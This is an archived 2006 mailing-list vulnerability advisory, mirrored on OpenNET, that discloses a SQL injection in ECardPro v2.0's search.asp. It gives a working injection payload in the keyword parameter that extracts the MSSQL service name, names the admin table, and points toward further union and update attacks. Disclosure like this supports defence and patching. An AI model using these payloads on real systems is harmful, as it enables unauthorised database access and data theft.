The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability


<< Previous INDEX Search src / Print Next >> 
Date: 17 Sep 2006 13:29:20 -0000
From: [email protected]
To: [email protected]
Subject: ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability
X-Virus-Scanned: antivirus-gw at tyumen.ru

Vulnerability Report
*******************************************************************************
# Title  :  ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.keyvan1.com

# Exploit;

*******************************************************************************

Data: MSSQL

###http://&#091;target]/[path]/search.asp?keyword='[SQL HERE]

Example: search.asp?keyword='AND%201=convert(int,%20@@servicename) ==> MSSQL Service Name

Admin Table: "admin"
etc(systemtables,union,update,select)......


# ajann,Turkey
# ...
# Im not Hacker!

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру